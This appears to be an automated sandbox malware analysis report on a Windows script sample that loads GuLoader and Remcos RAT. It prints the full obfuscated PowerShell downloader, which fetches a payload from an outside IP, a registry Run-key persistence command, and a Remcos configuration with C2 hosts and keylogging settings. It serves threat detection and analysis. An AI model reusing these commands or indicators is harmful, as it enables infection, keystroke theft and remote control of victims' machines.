Windows Analysis Report
rOferta_SKGNMECLemnedefinitionen353523577.wsf

Overview

General Information

Sample name: rOferta_SKGNMECLemnedefinitionen353523577.wsf
Analysis ID: 1429076
MD5: ed7122bfc1517425a483908cff86d950
SHA1: d71986894ac69f6958f3e126bec9eaabea50fa5c
SHA256: 813142e22c4d2a79a49e1f96a9bea8b14e13a67eb9d35922b5ac0b88b33aec6a
Tags: wsf

Detection

GuLoader, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 2532 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\rOferta_SKGNMECLemnedefinitionen353523577.wsf" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6256 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. 
';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. 
conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'Flex$B.rggJentlMatroAnkybSigraKommlSk,l:ChesNtripeImpodTugtlTernaBraig Pirt Mar=Lab.(StanTRidge Fres S mtTotr-We dPs laaNonetSov htame M.tr$Dis,Oevanv,heieTmm rOpstf F.oeDiseaRoomrRubefWarluSodalBa lnTviveEndos Pins Sth7supe9Gru.) U.d ');while (!$Nedlagt) {Bussemnd (Sarpedon ' For$CajugPiral rihoAnstbCampaRhodl and:tidsJ Fe eSissrDragnH stgpro,iDelstPolttPon eDocorVidesEksteTernnFor gSv.neSolen AnceMe a=Cog.$ B it SchrSrstu PepeRed, ') ;Bussemnd $fantasises;Bussemnd (Sarpedon 'StatS WortByggaxen.r ,tat Rej-PokeSTumol aueRefreSmaapOnom Lsm.4Demo ');Bussemnd (Sarpedon ',roi$Tyf gmuzzlAnfao.ptib SonaCocclS,iv:SyssNShrieMed dF,eklOmflaappegA.but lem=Raag(Pse.TConseAnnss Duetgast-DeliPFoneaKapitA.kehhusk Dy.k$ proODiskvImmueHundrSub,fmilieUninaHei rGoalf ,efu,rbelPensnNe rebedss.pers.osn7tach9Mona) De ') ;Bussemnd (Sarpedon ' Bis$ ontg cutlPoecojgerbTrekaDaimlRegr:SlgtS FruyGildn.ulpiTof,nTubbgYohisApadh NedaMnstlmisclLyseeBelerCommnDia,eTynd=B ne$EucrgAfstllunaoEndob YaraChail fe,:Ta,dKMor,abraveDeltmR.gnpBegrehelboSnipeAntir.uncnBygge Lav+Chad+Hypo%M rg$PereSFl pt StarRingeT,ppnSkbngStr eBestkIsraoDi.qr Hete rdnN ale Kap.BlokcTommoTempu UmanDdfdt Cam ') ;$skppeskn=$Strengekorene[$Syningshallerne];}Bussemnd (Sarpedon 'Shal$DespgCorol FodoNonpb AbdaSemilmoda: 
TviCFortoAbsemvi.upS,leoParanModieSupen KirtHi maChecl rav .os=Cory LaroGSlogeOenst Com-MiceCEl.aoBemjn ,nttLefteSt.mnTr.btOrds Ditm$AcoeOStrevEpiceJoggrudstfBereeVensaH,ndrH.idfalaruBetilViabnVindeR,ffscoprs,eka7Fore9 Fle ');Bussemnd (Sarpedon ' Uni$ mycgin slMiniolivebFl ea UnelTand:R.liO VisvIsoleDek.rSocisLnpaeC lln slisUdsgiZo.rbAfs.l.ugmeLdre Coun=Lave Marl[UndeSCreayG.nes ,fstPl.seNglem.lev..oluC .uboSovjn.onivCypre OxirPa,ttSkov]foed:Omsk: garFFordrPillo ThemAphoBOxycaJ,nnsButtePape6card4 .msSTjentEfterForsiCalan AntgWhos(Iagt$ KakCChanoHeuamUntrp Couo Ma nEgnseB.ugn Plat S.raForrl .om)Real ');Bussemnd (Sarpedon 'Invu$ bifg Su,lPar,oTritbparaaVejblAn e:GodtNcurioSkamnThi,d GeniJulelUnsiaEcontFrenaStrkbMattlOut e Hor Skor= Skj Dite[FornSThioyhiersDi.it lite Aurmford.Did TLayseDelixP.ritTomo. CorECon.n.lencPlotoFuncdPyrgi Fl nI.eagA.ti]Kryd:Star: lokABoobSParsCMo,eI Ly,IOpt,.PedeGRuthepanct StiSAurotPublr AmbiNonbnIch g Bef(Chyl$.andOSkyfvFrijePinkr .jes DiaeLouvn omps.amoi,houbDe tl B teIsoc)Genu ');Bussemnd (Sarpedon ' Pen$Provg.laylImproLibebTryka s rlInte:Cen DSkovaAscacoutftUbesy UnplAnaloMaimn EksovermmR,styLavi2Lu.r0Deni4Gul,=Stop$UredNMakaoGor.nK.lidRo.tiSy tlSo.aaNonitE,teaReprb NonlParaeN.bl.De isi.dau DiabStibsB.llt manr N,ni He nSureg Nem(Takk2 sti8Absa0Vire4,ami5Equi6Forl, Boo2 L.p7 The2 Kli2skgl5 .ag)Frui ');Bussemnd $Dactylonomy204;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5532 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sneglefart.Glo && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 1492 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" (obfuscated command line identical to that of PID 6256 above) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 4340 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sneglefart.Glo && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 5776 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • cmd.exe (PID: 5268 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 3236 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • cleanup

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution: APT33, The Gorgon Group, UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

{"Host:Port:Password": "jgbours284hawara01.duckdns.org:3050:0jgbours284hawara01.duckdns.org:3051:1jgbours284hawara02.duckdns.org:3050:0", "Assigned name": "Protected", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jnbcourg-8XH6PE", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mvourhjs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Source: C:\Users\user\AppData\Roaming\mvourhjs.dat; Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security

Source: 00000005.00000002.2491604213.0000000008650000.00000040.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_GuLoader_5; Description: Yara detected GuLoader; Author: Joe Security
Source: 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security
Source: 00000005.00000002.2491964679.00000000099BB000.00000040.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_GuLoader_2; Description: Yara detected GuLoader; Author: Joe Security
Source: 00000002.00000002.2646471533.0000023D6A311000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_GuLoader_5; Description: Yara detected GuLoader; Author: Joe Security
Source: 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_GuLoader_5; Description: Yara detected GuLoader; Author: Joe Security

Source: amsi32_1492.amsi.csv; Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC; Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen; Strings:
              • 0xdd6b:$b2: ::FromBase64String(
              • 0xce2e:$s1: -join
              • 0x65da:$s4: +=
              • 0x669c:$s4: +=
              • 0xa8c3:$s4: +=
              • 0xc9e0:$s4: +=
              • 0xccca:$s4: +=
              • 0xce10:$s4: +=
              • 0x166bb:$s4: +=
              • 0x1673b:$s4: +=
              • 0x16801:$s4: +=
              • 0x16881:$s4: +=
              • 0x16a57:$s4: +=
              • 0x16adb:$s4: +=
              • 0xd607:$e4: Get-WmiObject
              • 0xd7f6:$e4: Get-Process
              • 0xd84e:$e4: Start-Process
              • 0x151dd:$e4: Get-Process

              System Summary

              Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 5776, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)", ProcessId: 5268, ProcessName: cmd.exe
              Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: %Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 3236, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\nyerhvervelsen
              Source: Process started; Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community; Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5268, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)", ProcessId: 3236, ProcessName: reg.exe
              Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 5776, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)", ProcessId: 5268, ProcessName: cmd.exe
              Source: Registry Key set; Author: frack113, Florian Roth (Nextron Systems); Data: Details: %Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 3236, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\nyerhvervelsen
              Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\rOferta_SKGNMECLemnedefinitionen353523577.wsf", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\rOferta_SKGNMECLemnedefinitionen353523577.wsf", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\rOferta_SKGNMECLemnedefinitionen353523577.wsf", ProcessId: 2532, ProcessName: wscript.exe
              Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (obfuscated command line as shown for PID 6256 in the process tree; this entry is cut off in the source)
              Timestamp: 04/20/24-16:05:40.186650
              SID: 2032776
              Source Port: 49720
              Destination Port: 3050
              Protocol: TCP
              Classtype: A Network Trojan was detected

              Timestamp: 04/20/24-16:07:49.852728
              SID: 2032777
              Source Port: 3050
              Destination Port: 49720
              Protocol: TCP
              Classtype: A Network Trojan was detected

              AV Detection

              Source: http://pesterbdd.com/images/Pester.png; URL Reputation: Label: malware
              Source: http://geoplugin.net/json.gp; URL Reputation: Label: phishing
              Source: 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp; Malware Configuration Extractor: Remcos (same configuration as listed above)
              Source: jgbours284hawara01.duckdns.org; Virustotal: Detection: 6%
              Source: http://87.121.105.163; Virustotal: Detection: 17%
              Source: http://87.121.105.163/Belyves242.hhk; Virustotal: Detection: 15%
              Source: rOferta_SKGNMECLemnedefinitionen353523577.wsf; Virustotal: Detection: 11%
              Source: Yara match; File source: 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match; File source: Process Memory Space: wab.exe PID: 5776, type: MEMORYSTR
              Source: Yara match; File source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbj` source: powershell.exe, 00000005.00000002.2487543790.00000000072BF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.2116269833.0000023C50A81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2118566911.0000023C4EC7B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2487543790.000000000722D000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              Source: C:\Windows\System32\wscript.exe; Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              Source: Traffic; Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.6:49720 -> 45.88.90.110:3050
              Source: Traffic; Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 45.88.90.110:3050 -> 192.168.2.6:49720
              Source: Malware configuration extractor; URLs: jgbours284hawara01.duckdns.org
              Source: unknown; DNS query: name: jgbours284hawara01.duckdns.org
              Source: global traffic; TCP traffic: 192.168.2.6:49720 -> 45.88.90.110:3050
              Source: global traffic; HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
              Source: Joe Sandbox View; IP Address: 87.121.105.163
              Source: Joe Sandbox View; IP Address: 178.237.33.50
              Source: Joe Sandbox View; ASN Name: LVLT-10753US
              Source: global traffic; HTTP traffic detected: GET /Belyves242.hhk HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: 87.121.105.163 | Connection: Keep-Alive
              Source: global traffic; HTTP traffic detected: GET /DtExZZndAxdvvlCKCcIVF127.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: 87.121.105.163 | Cache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 87.121.105.163
              Source: unknown DNS traffic detected: queries for: jgbours284hawara01.duckdns.org
              Source: powershell.exe, 00000002.00000002.2558490378.0000023D5BBC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2558490378.0000023D5A4C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163
              Source: powershell.exe, 00000002.00000002.2558490378.0000023D5A4C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/Belyves242.hhkP
              Source: powershell.exe, 00000005.00000002.2481243191.0000000004A77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/Belyves242.hhkXR
              Source: wab.exe, 0000000A.00000002.4619411205.0000000022580000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4590474258.00000000030F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin
              Source: wab.exe, 0000000A.00000002.4619411205.0000000022580000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binFokusGulduelvalenza.it/DtExZZndAxdvvlCKCcIVF127.bi
              Source: wab.exe, 0000000A.00000002.4590474258.00000000030F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binPPv
              Source: wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bini
              Source: wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binm
              Source: powershell.exe, 00000002.00000002.2558490378.0000023D5BF19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.H
              Source: wab.exe, 0000000A.00000002.4590474258.00000000030F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/
              Source: wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4590474258.00000000030F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp
              Source: wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpg
              Source: wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpw
              Source: powershell.exe, 00000002.00000002.2646471533.0000023D6A311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2484190687.0000000005989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000005.00000002.2481243191.0000000004A77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.2558490378.0000023D5A2A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2481243191.0000000004921000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000005.00000002.2481243191.0000000004A77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.2558490378.0000023D5A2A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000005.00000002.2481243191.0000000004921000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
